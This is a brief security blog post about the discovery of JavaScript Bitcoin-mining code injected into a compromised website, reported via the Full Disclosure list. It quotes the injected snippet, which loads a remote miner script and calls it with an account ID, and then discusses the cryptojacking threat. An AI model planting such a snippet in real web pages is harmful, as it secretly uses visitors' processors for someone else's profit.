Skip to content
Trends

Bitcoin Mining Coming to a Compromised Web Site Near You

By Ken Simpson | 2 minute read

Bitcoin Plus Logo
A poster to the Full Disclosure mailing list announced today that he had discovered JavaScript-based Bitcoin mining software on a compromised web site. Here’s the original post for reference:

Group,
Recently I ran across the below on a site:

<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
BitcoinPlusMiner(10215318);
// ]]></script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above. Would be nice to find out what email address may have been
involved in compromising the site. Thanks for any help you may be able
to provide.

James

For those who are not in the know about Bitcoin, it suffices to say that Bitcoin provides a way of turning CPU cycles into cash. We’ve known for a while that botnet operators have been deploying Bitcoin mining programs onto compromised PCs. The difference with what’s been discussed today is that the mining happens not through a botnet installation, but rather simply by visiting the web site and running its JavaScript code in your browser (something that is automatic).

For a cybercriminal, the idea of deploying a bit of JavaScript onto a compromised web site and then monetizing millions of spare cycles of CPU time from web site visitors must evoke something close to a religious experience. Is it time for our web browsers to police JavaScript CPU consumption more aggressively?

Cut your support tickets and make customers happier